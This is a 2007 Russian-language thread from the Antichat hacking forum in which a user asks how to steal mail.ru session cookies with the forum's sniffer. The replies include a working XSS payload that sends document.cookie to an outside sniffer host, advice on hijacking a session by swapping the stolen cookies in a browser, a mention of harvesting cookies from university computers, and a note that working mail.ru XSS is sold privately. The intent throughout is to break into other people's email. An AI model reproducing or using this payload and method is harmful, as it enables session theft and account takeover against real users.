Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Снифер античата и mail.ru |
21.05.2007, 23:00
|
|
Новичок
Регистрация: 21.05.2007
Сообщений: 10
Провел на форуме:
11295
Репутация:
3
|
|
Снифер античата и mail.ru
Всем привет. У меня такой вопрос: как с помощью снифера на античате, (http://antichat.ru/cgi-bin/s.jpg) узнать куки на mail.ru ??
|
|
|
21.05.2007, 23:06
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Для этого тебе нужна XSS на mail.ru  |
|
|
|
21.05.2007, 23:15
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047
Репутация:
930
|
|
Сообщение от ice1k
Для этого тебе нужна XSS на mail.ru
Если просматривать письмо через Ж то можно украсть сессию. Только как нужно его просматривать я не знаю =(
|
|
|
|
21.05.2007, 23:16
|
|
Новичок
Регистрация: 19.05.2007
Сообщений: 11
Провел на форуме:
30549
Репутация:
11
|
|
а что толку от куков? они пароли не дают.
у меня есть папка с универа (все куки забрал...
ничего интересного, кроме адресов посещения, жж и блогов.
|
|
|
|
21.05.2007, 23:16
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от cigaretteburn
Всем привет. У меня такой вопрос: как с помощью снифера на античате, (http://antichat.ru/cgi-bin/s.jpg) узнать куки на mail.ru ??
снач можешь прочитать вот тут потом можешь посмареть тут а уже потом ...или найти самому активную или пасссиввную...или зайти сюда или сюда и поискать пост с XSS на mail.ru
|
|
|
|
22.05.2007, 00:50
|
|
Новичок
Регистрация: 21.05.2007
Сообщений: 10
Провел на форуме:
11295
Репутация:
3
|
|
Сообщение от Naf
а что толку от куков? они пароли не дают.
у меня есть папка с универа (все куки забрал...
ничего интересного, кроме адресов посещения, жж и блогов.
Как это толку? в опере меняеш куки и всё..
|
|
|
|
22.05.2007, 00:54
|
|
Новичок
Регистрация: 21.05.2007
Сообщений: 10
Провел на форуме:
11295
Репутация:
3
|
|
Сообщение от ice1k
Для этого тебе нужна XSS на mail.ru ну точто нужна XSS это понятно, а кто может дать именно код XSS работающий для использования снифа? 
|
|
|
|
22.05.2007, 01:14
|
|
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315
Репутация:
1228
|
|
Сообщение от cigaretteburn
ну точто нужна XSS это понятно, а кто может дать именно код XSS работающий для использования снифа? просто код вот:
Код:
<script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script>
естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи!
Но всеже в привате существуют рабочие XSS, но просто так тебе их никто не даст.
Разве что за $
|
|
|
|
22.05.2007, 01:24
|
|
Участник форума
Регистрация: 28.04.2007
Сообщений: 239
Провел на форуме:
2140476
Репутация:
161
|
|
естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи!
ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,
|
|
|
|
22.05.2007, 01:55
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Сообщение от ultimatum
ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,
Куда бы ты не заманивал пользователя, все равно должен быть xss на целевом сайте (в данном случае mail.ru)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
